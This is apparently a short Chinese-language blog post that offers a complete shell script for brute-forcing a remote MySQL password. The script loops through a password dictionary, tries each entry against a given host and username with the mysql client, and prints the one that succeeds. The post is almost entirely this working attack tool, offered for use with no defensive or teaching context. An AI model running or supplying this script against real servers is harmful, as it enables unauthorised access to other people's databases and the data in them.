标签归档:mysql

暴力破解mysql的一个shell

破解条件:知道远程主机的地址和用户名,和一个包含了密码的密码字典。

建立密码字典,其中一行一个密码。

#!/bin/sh

# Usage crackmysql username host passwordfile

USER=$1
HOST=$2
PASSWORDFILE="$3"

if [ ! -e $PASSWORDFILE ]; then  
    echo "$PASSWORDFILE is not exsit"
	echo "Use default file instead"
	PASSWORDFILE="/home/istrone/.bin/crack_mysql_passwords"
fi

echo "----------------------------------------------------------------"
echo "begin cracking mysql $USER@$HOST"
echo ""
for i in `cat $PASSWORDFILE`;
do
	echo "checking $i"
	echo "exit" | mysql -u $1 -p$i -h $2 2>/dev/null 
	if [ $? = 0 ]; then
		echo "----------------------------------------------------"
		echo " MYSQL PASSWORD is $i"
		break
	fi
done